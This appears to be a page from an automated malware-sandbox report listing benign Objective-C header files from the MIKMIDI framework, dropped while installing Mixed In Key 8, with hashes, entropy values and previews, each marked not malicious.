Preview:	//.// MIKMIDIMappingItem.h.// MIKMIDI.//.// Created by Andrew Madsen on 5/20/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDIMappableResponder.h".#import "MIKMIDICommand.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIMapping;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIMappingItem contains information about a mapping between a physical MIDI control,. * and a single command supported by a particular MIDI responder object.. . MIKMIDIMappingItem specifies the command type, and MIDI channel for the commands sent by the. * mapped physical control along with the control's interaction type (e.g. knob, turntable, button, etc.).. * It also specifies the (software) MIDI responder to which incoming commands from the mapped control. * should be routed.. . /.@interface MIKMIDIMappingItem : NSObject <NSCopying>../*. Creates and initializes a new MIKMIDIMappingItem instance.. . @param MIDIResponderIdenti

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_cDSpsD Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	4.942661122591586
Encrypted:	false
SSDEEP:	24:Zm2mYbiPEL0OZV1a2m21j7GzQgQ2mqS2m21m2mo7TzTs:HiPEYOZT3FazQg/PhPzo
MD5:	8EFD03FB97FE422192E6BA39D5350C0C
SHA1:	B1C418E9170C2F389F2D27F09DC4D03B9CF5D332
SHA-256:	49EB33224DB8BB87693D78F6A820C52F464A4742E4539BA3D5615A6498268675
SHA-512:	E920061C88B1F6AF97E4701B9F9EC0D13C0DA335C559FA290A0A7855B1F72708237BDE386EF387D3B5AF23A311886088E31D113AEDDB59FD301E48C85690E672
Malicious:	false
Preview:	//.// MIKMIDIPolyphonicKeyPressureCommand.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/12/15..// Copyright . 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h"../*. A MIDI polyphonic key pressure message. This message is most often sent by pressing . * down on the key after it "bottoms out".. /.@interface MIKMIDIPolyphonicKeyPressureCommand : MIKMIDIChannelVoiceCommand../// The note number for the message. In the range 0-127..@property (nonatomic, readonly) NSUInteger note;../// Key pressure of the polyphonic key pressure message. In the range 0-127..@property (nonatomic, readonly) NSUInteger pressure;..@end../. The mutable counterpart to MIKMIDIPolyphonicKeyPressureCommand.. */.@interface MIKMutableMIDIPolyphonicKeyPressureCommand : MIKMIDIPolyphonicKeyPressureCommand../// The note number for the message. In the range 0-127..@property (nonatomic, readwrite) NSUInteger note;../// Key pressure of the polyphonic key pressure message. I

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_cYRDEO Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	2000
Entropy (8bit):	4.87080851854066
Encrypted:	false
SSDEEP:	48:a5sh4jsV5sH5sD5sP9n5sgcUCRSFJ5stjs3mGehE2e4Oe6FExBmd0vxNZ5s4GZtE:FhvIma8dULFUiIAytxnJqrzVHyin81JZ
MD5:	0D40516412961E458ADF6919E6B78840
SHA1:	A616A3C92C82BD5E08305DE4BD1502786CA05DAD
SHA-256:	F3811A92EC5686B8C6F42138304ED59C4C9CF25C2601873D5BECBEB3BC684DBA
SHA-512:	3695AAB1CD6DFAD30322E4D2F243D0A6C8556E85947A46AC7B5BC58034A595DD97380AE7857D5F43D5753AEA5EBD07282805919019A988B0C5AA62945633B6F4
Malicious:	false
Preview:	//.// MIKMIDIClientDestinationEndpoint.h.// Pods.//.// Created by Andrew Madsen on 9/26/14..//.//..#import "MIKMIDIDestinationEndpoint.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIClientDestinationEndpoint;.@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN..typedef void(^MIKMIDIClientDestinationEndpointEventHandler)(MIKMIDIClientDestinationEndpoint destination, MIKArrayOf(MIKMIDICommand ) commands);../. .MIKMIDIClientDestinationEndpoint represents a virtual endpoint created by your application to receive MIDI. .from other applications on the system.. . * Instances of this class will be visible and can be connected to by other applications.. /.@interface MIKMIDIClientDestinationEndpoint : MIKMIDIDestinationEndpoint../. Initializes a new virtual destination endpoint.. . This is essentially equivalent to creating a Core MIDI destination endpoint. * using MIDIDestinationCreate(). Destination endpoints created using this. * method can be used by your appl

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_d7QdNU Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	4.87609895474185
Encrypted:	false
SSDEEP:	48:JjsbtYRKjsRhw97GiLPMc3eyp+ez7jjs7hPSaRwjsGriozI5ev5smee5sbjsgcy:ObatRILNug3cvR3iiozI8uTBEgcy
MD5:	5FCF9092A4857837FAC14D3987B42E8C
SHA1:	E6318343C45AF056CAA0EB027880F0A2D4AE7F39
SHA-256:	550BDFF1BFA34DC72147E0A466B89361508C8583B66058F55417FFD035B1769A
SHA-512:	AF1BA3554B4C6236B5B0642787BDC4236D2A4F8CD0320AB18C368468436FAA92398FFF9E152F64403D494DCA652EAAA91ED9A7005E10A0BD3D12AFB6D6934110
Malicious:	false
Preview:	//.// MIKMIDIDestinationEndpoint.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIEndpoint.h".#import "MIKMIDICommandScheduler.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIDestinationEndpoint represents a source (input) MIDI endpoint.. * It is essentially an Objective-C wrapper for instances of CoreMIDI's MIDIEndpoint class. * which are kMIDIObjectType_Destination type endpoints.. . MIDI destination endpoints are contained by MIDI entities, which are in turn contained by MIDI devices.. * MIDI messages can be outputed through a destination endpoint using MIKMIDIDeviceManager's. * -sendCommands:toEndpoint:error: method.. . Note that MIKMIDIDestinationEndpoint does not declare any methods of its own. All its methods can be. * found on its superclasses: MIKMIDIEndpoint and MIKMIDIObject. Also, MIKMIDIDestinationEndpoint itself. * is only used to

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_eGlTwG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	6434
Entropy (8bit):	4.8664082520558845
Encrypted:	false
SSDEEP:	96:fNWfSWuctdFjpMHETZx2WJ1qJ/6YwOKIks/fJeTM+21cadvKYqKH+C:lSS+tHpeXECHOscaX9
MD5:	E9C1189C947302CA15DFFCC20252416E
SHA1:	AD484F95BBAE7B0C15FA6565CE1B67CE037BA267
SHA-256:	5FC2515A168E5D3D894BC4718A47F169AF099558A29885BD4C899B95EBDC0A74
SHA-512:	924BA96E9E1B8C79282577E6F5E6257103DB5880FD5DA4342C8DA1F612AFE8341015774836BB100A8B67B34532A74C2A92B268F8EE22B358BB69309146431390
Malicious:	false
Preview:	//.// MIKMIDIMappableResponder.h.// MIKMIDI.//.// Created by Andrew Madsen on 5/20/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDIResponder.h".#import "MIKMIDICompilerCompatibility.h"../*. Bit-mask constants used to specify MIDI responder types for mapping.. * Multiple responder types can be specified by ORing them together.. * @see -[MIKMIDIMappableResponder MIDIResponderTypeForCommandIdentifier:]. /.typedef NS_OPTIONS(NSUInteger, MIKMIDIResponderType){../.. Responder does not have a type. Cannot be mapped... /..MIKMIDIResponderTypeNone = 0,..../.. Type for a MIDI responder that can handle messages from a hardware absolute.. * knob or slider. That is, one that sends control change messages with an absolute value.. * depending on its position... /..MIKMIDIResponderTypeAbsoluteSliderOrKnob = 1 << 0,..../.. Type for a MIDI responder that can handle messages from a hardware relative.. * knob

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_gtlElV Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	2528
Entropy (8bit):	4.883260419804713
Encrypted:	false
SSDEEP:	48:g/4Yonpm2js/lWYxphG6tVNRUNrvGxefGu90PYoGOiXucEG6tVNRUNrvGxefGu9V:g/mm5/lWUpbMNrvjz9CYCeunMNrvjz9V
MD5:	22D88676254FAF28DF6CE54D21947C6C
SHA1:	48AF424C9A5A52A1E20D5B2034868347E598B8D0
SHA-256:	379127A2A59992FF715B21FDE95CAAA83F7DEF2856391E65A39EB86244DD43BB
SHA-512:	D3C14C7E5ADE3ED9B6A7E32B100F20FDDE11B8B904F8C22AF27996C0F27735BC167935DF745DC89AE38583B71C7C16C14C785049E877E0CABE99655BB8BD3056
Malicious:	false
Preview:	//.// MIKMIDIEntity.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIObject.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIDevice;.@class MIKMIDIEndpoint;.@class MIKMIDISourceEndpoint;.@class MIKMIDIDestinationEndpoint;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIEntity represents a logical grouping of endpoints within a MIDI device. It essentially. * acts as a simple container for endpoints.. . As part of MIKMIDIDevice's support for wrapping virtual endpoints, an MIKMIDIEntity can also. * be created using virtual MIDI endpoints.. /.@interface MIKMIDIEntity : MIKMIDIObject../. Convenience method for creating a "virtual" MIKMIDIEntity instance from one or more virtual endpoints.. * This method is typically not called directly by clients of MIKMIDI. Rather it's used by MIKMIDIDevice's. * internal machinery for creating virtual devices.. . @param endpoints An array of one

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_hajBZI Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	726
Entropy (8bit):	5.1279292269280266
Encrypted:	false
SSDEEP:	12:ZhAm2IUNXbwY8vnPvohlvhAm2qhY1SAF7Am2r6Am2qhAm2TKT3Kshky0FQz8e6:ZhJfMw73Ah1hJvhLg7JO6JvhJ/w
MD5:	57845F2556DEFBE69E3E313E403F9BB1
SHA1:	D3A7D5A800E7F8A9883BD748EF735E5272C51234
SHA-256:	46384AE5AFAF4F4FAFD2DEEEB09CC4BCBA48D680ED57F700F05771475CFA376C
SHA-512:	4A82B63B98F6D04A64B79830964F40708A8DC7D2F675F68262A750A229C8CC0417385925238B120E799FABB86B532EB813AC354FD46FB109CB5553A94B9E0C0A
Malicious:	false
Preview:	//.// MIKMIDIMetaLyricEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A meta event containing lyrics.. /.@interface MIKMIDIMetaLyricEvent : MIKMIDIMetaTextEvent..@end../. The mutable counterpart of MIKMIDIMetaLyricEvent.. /.@interface MIKMutableMIDIMetaLyricEvent : MIKMIDIMetaLyricEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData metaData;..@end..NS_ASSUME_NONNULL_END

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_iL45vG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	2794
Entropy (8bit):	4.901660501536985
Encrypted:	false
SSDEEP:	48:hFrY1bAsgMOkUyF3BGOiB6G5o7gSYoNdZhXsD7lY49WlFYIk1FiM6TfwUGIU8b8Q:LCksgiUE31ouRNJCglZnTdGr/o
MD5:	3139950DEEC057B9474813405C53A1EB
SHA1:	B3F1055B0AA0467F6F21D21AEA54B5AF396A91D6
SHA-256:	AD8D64D43DA6BC3C6708F8578B16CA2429D6B6BE3A769EB4544CCB2F4924052C
SHA-512:	A37C6F196111F3ACB8A79A1A0F3338D71555FAEC0142F7104C17C29F7A2FC828C780F25C28CCC5C5D942C1D785B8315934352721ECBF1F9A334A8B183D94D777
Malicious:	false
Preview:	//.// MIKMIDIResponder.h.// Energetic.//.// Created by Andrew Madsen on 3/11/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../*. The MIKMIDIResponder protocol defines methods to be implemented by any object that wishes. * to receive MIDI messages/commands.. . Any class in an application can implement this protocol. To actually receive MIDI messages,. * a responder object must be registered by calling -[NS/UIApplication registerMIDIResponder].. * Additionally, it is the client application's responsibility to pass incoming MIDI messages to. * the application instance by calling -[NS/UIApplication handleMIDICommand:]. /..@protocol MIKMIDIResponder <NSObject>..@required./. Returns an NSString used to uniquely identify this MIDI responder. Need not be . * human readable, but it should be unique in the application.. . This id

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_irbY3B Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	784
Entropy (8bit):	5.047424079472958
Encrypted:	false
SSDEEP:	12:ZhvIUNXbwY8vnPvohlviBvqhY9SAF7vr6vqhvTKT3Kshky0FQz8e6:ZhvIMw73Ah1iBvqhtg7vr6vqhvUw
MD5:	D7EAF00E9FD00773D3F855B2C596B905
SHA1:	998188822CC670CC8DCD214C77DCF15ED1783B49
SHA-256:	2DBED457DD6D95F5021D2F300DD884CAA424903964AA8CF3C4175C94C6F8A53E
SHA-512:	78958B85AD0DF6FEEF3853AF5454862F13FD1947A6F664F15842BD5B0EF1E6A5AE6E9BEC6EE03B96E0C11ED5A7C31782FADD8F95C229A0FF01C41F3020200DA3
Malicious:	false
Preview:	//.// MIKMIDIMetaInstrumentNameEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A meta event containing an instrument name.. /.@interface MIKMIDIMetaInstrumentNameEvent : MIKMIDIMetaTextEvent..@end.../. The mutable counterpart of MIKMIDIMetaInstrumentNameEvent.. /.@interface MIKMutableMIDIMetaInstrumentNameEvent : MIKMIDIMetaInstrumentNameEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData metaData;..@end..NS_ASSUME_NONNULL_END

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_jNE5sR Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	3779
Entropy (8bit):	4.980163778337072
Encrypted:	false
SSDEEP:	48:7/YY3kW2UQ2KG0Hy7vPh5fMO6B+Vd/eP/UwEdbl8us3fgF7:7/EYPh5EfuReP/UwE1l8JfgF7
MD5:	03E868533D8693EE20F7690AA853A792
SHA1:	95A52DFD0B85EDE83B6E9EEAFB7D297656B919B6
SHA-256:	CF3E85F290B0BE4021948D982ECFF3E81B72CD8C2274F216C4D1B6A50628B489
SHA-512:	061192E4BEA8A7717B0004CC76C4EF8F48F119D1C3E0999512E2A86B71728228ABC3466CD35BD2BD0A194419EA79DDDBAFB02DB53ED241A5627367AB4033DFF3
Malicious:	false
Preview:	//.// MIKMIDISystemExclusiveCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDISystemMessageCommand.h".#import "MIKMIDICompilerCompatibility.h"..#define kMIKMIDISysexNonRealtimeManufacturerID 0x7E.#define kMIKMIDISysexRealtimeManufacturerID 0x7F..#define kMIKMIDISysexChannelDisregard 0x7F.#define kMIKMIDISysexBeginDelimiter 0xF0.#define kMIKMIDISysexEndDelimiter 0xF7..NS_ASSUME_NONNULL_BEGIN../*. A MIDI System Exclusive (SysEx) message. System exclusive messages are. * messages defined by individual manufacturers of MIDI devices. They. * can contain arbitrary data and can be used to support commands and responses. * not explicitly supported by the standard portion of MIDI spec. There are also. * some "Universal Exclusive Mesages", which while a type of SysEx message,. * are not manufacturer/device specific.. */.@interface MIKMIDISystemExclusiveCommand : MIKMIDISystemMessageCommand

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_jvOB1R Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	583
Entropy (8bit):	5.2325377323386855
Encrypted:	false
SSDEEP:	12:ZXR3LEPRbAU5vnzejluWRj01djpaGSfnsY1TLbrPxhqRIU2E:ZXR30R15KJ7Rj01djDBY1TLPPqRJ
MD5:	E55BDB6A74ED29367EA4B08402282755
SHA1:	02A524B227886284B060BBD697A084B3C482BFD5
SHA-256:	D26E90AF35BD9ECD55588BCFB18341F9B31D01002F8AF46E25E7875E2F782C3F
SHA-512:	1E388158CA233FBC9EE80CB52913AD71D130FF355EB52BDDD39565A69AF0ED159F112F8320E23AAA7C07E6C70BD2F10E4E9F802DFBFAE5D5D3CDA5BE7355274D
Malicious:	false
Preview:	//.// MIKMIDICommandScheduler.h.// MIKMIDI.//.// Created by Chris Flesner on 7/3/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../*. .Objects that conform to this protocol can be used as a destination for MIDI commands to. .be sent to by MIKMIDISequencer.. . .@see MIKMIDISequencer. /.@protocol MIKMIDICommandScheduler <NSObject>..- (void)scheduleMIDICommands:(MIKArrayOf(MIKMIDICommand ) )commands;..@end..NS_ASSUME_NONNULL_END.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_kMt4C7 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1164
Entropy (8bit):	5.15243202482787
Encrypted:	false
SSDEEP:	12:Z7PC/bdObFxlvnPvnhq8moHmWJKkPIexv1K7kQXiraSAFNPZYPI7PVirgKTCQz13:Zu/bdcB3CoGwKPt/CgfYAM
MD5:	5B2FBDEEF039908BF6B9F4E2F0FDD069
SHA1:	FC97E4DFA4A8A2183F05F1265DFCD8CDC4E8C148
SHA-256:	F7C28883CF18FB8B89B2C470458A89E3BC7ED2728A3A82137033D73F8746893A
SHA-512:	DCBB356CEEAA91EFF021FD6A33FFC7A202143B7C367DD02C5A1FC5D5C72C0F73ABF6F010E12DB720B41084E96858F41CCEE62B2328D7020BEEECCB90C4907F6E
Malicious:	false
Preview:	//.// MIKMIDIPitchBendChangeEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/4/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A pitch bed change event.. . This event indicates a pitch bend change. On devices, pitch. * bends are usually generated using a wheel or lever.. /.@interface MIKMIDIPitchBendChangeEvent : MIKMIDIChannelEvent../. A 14-bit value indicating the pitch bend.. * Center is 0x2000 (8192). . * Valid range is from 0-16383.. /.@property (nonatomic, readonly) UInt16 pitchChange;..@end../. The mutable counterpart of MIKMIDIPitchBendChangeEvent.. /.@interface MIKMutableMIDIPitchBendChangeEvent : MIKMIDIPitchBendChangeEvent..@property (nonatomic, readonly) UInt16 pitchChange;..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, strong, readwrite, null_resettable) NSMutableData data;.@property (n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_m2ysU7 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	984
Entropy (8bit):	4.846917516525859
Encrypted:	false
SSDEEP:	24:ZhrbXyEwEHQG3+xM1eh+486cvh1ro5GXr3/mMGPtlui8LI:LXyEGZG4EZ1rUGXDpG+/LI
MD5:	366CBFA18DD9F76DDA0675C0664663AE
SHA1:	BCAD7B5DB1BBBC521F8D3A6C04D7C6EC25EB4C14
SHA-256:	2CDA004503B8882DEDCA4343AFAE127865142758097363EDF5D615C2104D5174
SHA-512:	B8B8FB8304E4CD777F4B1D664DABF4A2D76ED4B33BD5F3197175FD77B2227044B74B426795481C6172E9AEDACF802A3DE706573BC058AA76C9642768F1041C1D
Malicious:	false
Preview:	//.// MIKMIDIMetaEvent_SubclassMethods.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/10/15..// Copyright . 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaEvent.h".#import "MIKMIDIEvent_SubclassMethods.h"..@interface MIKMIDIMetaEvent ()../*. Initializes a new MIKMIDIMetaEvent subclass with the specified data, inferring. * the meta data type using +supportedMIDIEventTypes. Only meant to be used internally. * to more easily implement custom initializers.. . @param metaData An NSData containing the metadata for the event.. * on this value. If this value is invalid or unknown, a plain MIKMIDIMetaEvent instance will be returned.. * @param timeStamp The MusicTimeStamp timestamp for the event.. . @return An initialized instance of MIKMIDIMetaEvent or one of its subclasses.. /.- (instancetype)initWithMetaData:(NSData )metaData timeStamp:(MusicTimeStamp)timeStamp;..@property (nonatomic, strong, readwrite) NSData *metaData;..@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_nSheHQ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1770
Entropy (8bit):	4.851084757038362
Encrypted:	false
SSDEEP:	48:KMcgcUZFVn3m6hEKE6FEzQd0NhHGsyinoGjghQ7zGnvF2NNbSYV:KMcdUZFVnHvEtzbN7yinYS742NNbB
MD5:	B8A38DA039F2388CF6C4FDF1DB2B7F91
SHA1:	7F6274EF9A77D91B29E6D7F8DFF126CFD89C8D9F
SHA-256:	C18F7F5E0A45DA623BA2FC50E8F7D5E034C0E0B6AED2512399E3B084DCF2C4C2
SHA-512:	A8C5E109C6510C7BA300EDDDF0FBFEC5F5C0B1C3F7F8F9C62692386FF9F8E228BD37EAC88100FF7C8F28A353841F22A5E9BB750439DEE2ADD26BEB0EC30645F9
Malicious:	false
Preview:	//.// MIKMIDIClientSourceEndpoint.h.// MIKMIDI.// .// Created by Dan Rosenstark on 2015-01-07.//..#import "MIKMIDISourceEndpoint.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../*. .MIKMIDIClientSourceEndpoint represents a virtual endpoint created by your application to send MIDI. .to other applications on the system.. . * Instances of this class will be visible and can be connected to by other applications.. /.@interface MIKMIDIClientSourceEndpoint : MIKMIDISourceEndpoint../. Initializes a new virtual source endpoint.. . This is essentially equivalent to creating a Core MIDI source endpoint. * using MIDISourceCreate(). Source endpoints created using this. * method can be used by your application to send MIDI rather than receive. * it. They can be seen and connected to by other applications on the system.. . @param name.A name for the new virtual endpoint.. . @return An instance of MIKMIDIClientSourceEndpoint

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_pEIkBX Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	4.842994059840263
Encrypted:	false
SSDEEP:	48:ZVAdBoiNfEfjYFAYwNa9v+8rPXBZHo+XGuleZHcN/pNnGul78eq+4gaML6:ZQQjYfT9v+0PLrYyRbL4gf6
MD5:	8A92AD39CEF7E9D2AED5459A29C986B2
SHA1:	AC26AEB3C38A0E850F7E73BDBE9B9DCC2F6A27F6
SHA-256:	CF45B1E56A9C0BE89B660E39EF53892A6FA237977EF27FCB58C77E42381B13C1
SHA-512:	203E4D71052650B4CD72FFDBDCC5DE8C54BE2CC8EFEDDBFFA7B8F814C5820B36F2DEB7BAD2F9CB9D15FCCEC2FD22B9CC37107AB7A6DD2B37C877E76DCEAAC352
Malicious:	false
Preview:	//.// MIKMIDITimeSignatureEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaEvent.h".#import "MIKMIDICompilerCompatibility.h"../*. Represents a time signature. Note that in contrast to time signature events in raw MIDI,. * the denominator here is the "natural" denominator for the time signature. e.g. 4/4 time. * is represented with a numerator of 4 and denominator of 4.. /.typedef struct {..UInt8 numerator; /// The number of beats per measure...UInt8 denominator; // The fraction of a whole note per beat (e.g. 4 here means a quarter note per beat).} MIKMIDITimeSignature;../. Convenience function to create a MIDITimeSignature struct.. . For example, to create a time signature struct for 4/4 time:. * MIKMIDITimeSignatureMake(4, 4). . @param numerator The numerator for the time signature, or number of beats per measure.. * @param denominator The denominator f

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_pVV4kK Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	2669
Entropy (8bit):	4.944861168209807
Encrypted:	false
SSDEEP:	48:XHY1HjmLt1eax8su6tTMICx9C5mGREqmGXJjopmGXshp:X2Hin6oTfvZLcg
MD5:	9D330C12E874DF25E555BCEA43C2D90C
SHA1:	A1006704B634BA30C4D5E30EF234D957F18D63CD
SHA-256:	D51A053CCA5B9B676C8701B63A81838A796DBF609A1EB111F263ED3575796505
SHA-512:	105408A1797BCAFA14061CE76FC50257904B975C3C7B038DD49BCCC11B72B9F726B63DC6823D3C291BAA4C229BB0DF65E57316671B9FD16C0515A28A0F0AA8E0
Malicious:	false
